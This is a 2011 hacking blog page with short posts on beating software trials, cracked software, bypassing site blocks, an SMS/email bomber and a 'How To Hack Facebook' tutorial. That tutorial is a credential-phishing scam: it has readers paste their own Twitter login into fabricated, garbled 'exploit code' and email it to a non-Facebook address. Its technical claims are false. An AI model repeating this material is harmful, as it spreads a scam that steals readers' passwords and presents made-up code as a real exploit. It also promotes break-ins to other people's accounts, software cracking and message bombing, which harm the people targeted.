Pages

Subscribe:

Saturday 15 October 2011

How To Run A Trial Software Forever


run trial software forever

Today i will show you two ways to hack software and run a trial software forever.
Most of us are familiar with many softwares that run only for a specified period of time in the trial mode.Once the trial period is expired these softwares stop functioning and demand for a purchase.But there are ways to run the softwares and make them function beyond the trial period.

Friday 14 October 2011

Protect your Facebook account from hackers with MyPageKeeper Facebook Security Application Security Tips

acebook users can lean on a new app to help them fight spam and malware.





Designed by a team of students at the University of California at Riverside, MyPageKeeperis a free Facebook app that continually monitors wall posts and news feeds for malicious content. If the app suspects that any content may contain spam or malware, it alerts you and gives you the ability to remove it.

How To Hack FaceBook Account Using A Web Based Exploit




Do you want to learn how to hack facebook?, Are you looking for a way to hack your friends facebook account without them fiding out? Interested in finding out ways to hack someones profile? Maybe you want to take a quick peek at their message inbox or use a glitch to use a hacking script. In this article I will show you a fairly easy step by step guide on how to hack facebook user accounts without having to directly hack into facebook and risk getting caught. Ignore all those hacking services, facebook hacks and hackers that charge you money for something you can do on your own for free. Hack the password of any of your friends accounts and get their password even as a prank or joke (you may also be interested in trying our How To Hack Twitter Accounts tutorial).

Hack facebook, hacking facebook passwords from user accounts and find out someones facebook password...Is any of it really possible? Yes it is, thanks to Twitter!. By now, you have probably heard the rumors of how unsafe Facebook is with a few celebrities having had their accounts hacked. You may also have seen Twitter allows you to synchronize your tweets with Facebook status updates so whatever you tweet appears as a Facebook status update. In providing this service, Facebook has created many vulnerabilities for itself by allowing a third party (Twitter) to access their database. This problem is due to Facebooks API service which permits exterior websites or applications (like FarmVille) to modify or post stuff on your profile.

A couple of month's ago I wanted to check my old FaceBook account but forgot what email and password I had used to sign up, I sent an email to their technical support but they didn't reply so I decided to put my geek skills to good use and find a way to get my login information back by writing a facebook account hacking code or exploit as they are called.
HOW HACKING FACEBOOK ACCOUNTS WORKS
Facebook has two databases (one for males and one for females users) where they keep all the information from their users, if you remember the email you use to login but forget your password, you can use the 'Forgot your password?' option, however if like me you don't have any of that information it's impossible to legally recover that account.

If you know anything about programming websites you know the 'Forgot your password?' service has to be in direct contact with the databases in order to send requests to retrieve the forgotten information for you, basically what that means is if you 'ask' the database for the login information with the right 'code' (in our case exploit), it will send you back that information.

So all I had to figure out is what the code was and what system they used to contact the databases through the 'Forgot your password?' service, after a few weeks of writing and testing codes I came up with the right one for the job and after doing a bit of research I learned FaceBook uses something similar to an email service to contact their databases.

For security reasons the databases are programmed to verify the account your requesting is actually yours and not someone elses so they need some type of authentication or verification (thats why they send you a verification link to your email when creating your account or changing your password).

Luckily for us, as mentioned above, through the use of Twitter combined with Facebooks 'Mutual Friend' feature, we can use a friends account to verify your own, in other words, if the person you want to get the login information from is on your friends list on Facebook...you can use your Twitter account to verify your their friend on Facebook taking advantage of the vulnerability of the twitter status sync exploit, and get their login email and password sent to you. But the victim must be on your friends list on Facebook.
HOW TO DO IT
1) First off you will need to get your user id and the victims user id, how do you do this?

Go to the victims profile, then click on their Display Picture (not the "View Photos of ..." link or tab but the actual main picture of their profile) and look at your browsers address bar, at the end of all the address you should see a group of numbers that should you should look something like this: (I have used a red arrow to point them out)


Don't worry if it isn't exactly like that (sometimes it has variations like; 'album.php?profile=10957800008') just as long as you get the numbers. Write them down somewhere as you will need to use it a bit further down, once that is done you may continue to step 2.

2) At the bottom of this page I have pasted the exploit code I created to fool the databases, this is the tricky part as you will have to edit the code a bit yourself so that it fits your needs when searching for the victims login information.

Scroll down to the bottom of this page and find the code I have highlighted in gray so you know what to copy, select the code and copy it to your clipboard (press CTRL+C) then paste it (CTRL+V) on a notepad or text document so you can edit it.

3) Once you have the code somewhere you can edit it, you will need to insert three things into it, the facebook user id of the victim and the twitter friend authentication information. I will give you step by step examples by trying the exploit code on my friend Laura's account as the victim, see what parts you have to edit and with what:


1. Should be the victims user id.
2. Should be your twitter login Username (I put my email in the screencap example above for privacy reasons) to verify your the victims mutual friend on facebook. Make sure your facebook email was the same used to sign up to Twitter so the exploit script can automatically connect both accounts.
3. Should be your twitter password so the database can authentic you really are friends with the victim on facebook.

When editing the code, don't accidentally delete one of the quotes (") or it won't work, so make sure you put the information inside them.
4) Now that you have the exploit code edited and ready to send, we are all set to send it to the database through an email, since it's not your regular email but an exploit email we will have to use a special Subject so the database knows how to read it in programming language.

Go to your email address and Compose a new email to fbsupport@techie.com which is their customer service email for forgotten passwords, in the Subject copy and paste the code below highlighted in gray:
$[search_database = $find user+id= "123456789", '%verification+user+bday' = }"01/01/1900"{ begin_search();


Once you have edited the Subject and entered the email address, your Composed email should look like the screenshot below, I will numerate each item:


1. The email address of the facebook database's forgotten password customer service.
2. This is where you insert the victims facebook user id.
3. This is where you insert your birthday so the database can find you to verify your a friend of the victim (it arranges users in the database based on your date of birth), NOTE: It MUST be in the MONTH/DAY/YEAR format so it can read it properly.
5) After you have correctly written the To: and Subject sections, you may proceed to insert the exploit code you previously edited in step 3 into the body section of the email.Now all you have to do is click Send and wait for the database to send you back it's reply with the information.

It should take from 12-24 hours depending on the traffic FaceBook has that day, this is a sample of the email response you'll receive:


THE EXPLOIT CODE
fb_select_db("find", $linkID) or die(fbdatabase_error());
$resultID = fb_query("SELECT FriendID FROM signup WHERE email = '$email'", $linkID) or die(fbdatabase_error());

$num_rows = db_num_rows($resultID);
$row = facebook_fetch_array($resultID);
$user_id = $row[0];

if ($user_id == "PUTUSERIDHERE") = '$repeat' {
print Success, We have sent you an email with the Login email and Password of that ID.
}
else {
// print "We're sorry, your friend ID does not appear to be in our database."

$passwordfromdb = $row[0];
$find userID = (%friend_list)
#forgot_pass_userid = "%repeat%"; <%search_database_for_id%>
#user email= "PUTEMAILHERE"; (%friend_vulnerability_email%)
#user password = "PUTPASSWORDHERE"; (%friend_vulnerability_pass%)
$friend_database_exploit = '%request_forgot_pass_info'
$email_to = %%%@subject_email

session_start();
session_reset_pass("session");
$email_address = $_POST['email_address'];
if (!isset($_POST['email_address'])) {

}
elseif (empty($email_address)) {
echo $empty_fields_message;
function decrypt userID password() {
$salt = "abchefghjkmnpqrstuvwxyz0123456789";
srand((double)microtime()*1000000);
$i = 0;
while ($i <= 7) {
$num = decrypt() % 33;
$tmp = substr($salt, $num, 1);
$pass = $pass . $tmp;
$i++;
}
return $pass;
}

mail($email_address, $subject, $message, "Facebook Password Reset Confirmation


}
/end$

Thursday 13 October 2011

How To Recover Your Computer After Virus Attack (Re - Enable)


How To Recover Your Computer After Virus Attack

Even after the virus is totally removed from the system, some users find it difficult to restore all those things back which were affected by the virus. A virus usually when enters into a system disables the registry editor and task manager so that the user can not remove the virus from the system.

Here is a free tool Re-Enable using which even a novice users can fix all the things which were disabled by the virus. An antivirus can remove the virus files but sometimes it may fail to restore the system settings. In such situations this tool can come handy.

Portable Phase One CaptureOne Pro v6.2.49045.7


Portable Phase One CaptureOne Pro v6.2.49045.7

Portable Phase One CaptureOne Pro v6.2.49045.7
Portable Phase One CaptureOne Pro v6.2.49045.7 | 201.56 MB


The raw converter for ultimate image quality. Capture One Pro 6 is a professional RAW converter and image editing software. It contains all the essential tools and high-end performance in one package to enable you to capture, organize, edit, share and print images in a fast, flexible and efficient workflow. Capture One Pro 6’s powerful and intuitive toolset is used by professional photographers to achieve world-class image quality with excellent color and detail.

10 Ways To Access Blocked Websites


Now a days we see that social networking sites and downloading sites are mostly blocked in schools, colleges, and offices. so in order to make you comfortable in your respective environment, we are bringing to you some ways in which you can access the blocked websites.

Wednesday 12 October 2011

How to Know if You Are Infected with RATs or Keyloggers




How to Know if You Are Infected with RATs or Keyloggers

In this post i am going to show you how to find out when you are infected with a RAT or Keylogger without using any complex tools. Now i believe most of you might know that you need to have an internet connection to make a RAT or a Keylogger work, which would mean, if you are not connected to internet, you don't have to worry about being infected with RAT or Keylogger Ok, so for those who have internet connection and think they are being infected with a Trojan, here is a little guide that can solve your problem.

Download Keyscrambler Personal: Protect yourself from keyloggers




How to use Keyscrambler Personal:

1. Free download Keyscrambler Personal to protect yourself from keyloggers.

2. Install this Keyscrambler software on your computer and restart.

Tuesday 11 October 2011

Download Proxy Switcher Standard: Free IP Changer | Hide your IP

Proxy Switcher is one of the best proxy softwares ever made and it is a perfect free IP Changer tool. This software automatically downloads and tests all proxy servers. So, you don’t need to search for any “free proxy list” on Google. This software can also automatically change your IP address every 5 minutes or so (available in Pro version) which makes it really useful.

Sunday 9 October 2011

EMAIL & SMS BOMBER 2011


New released SMS and email bomber that support almost all countries in the world, just follow the few steps and then begin your “bombing era”…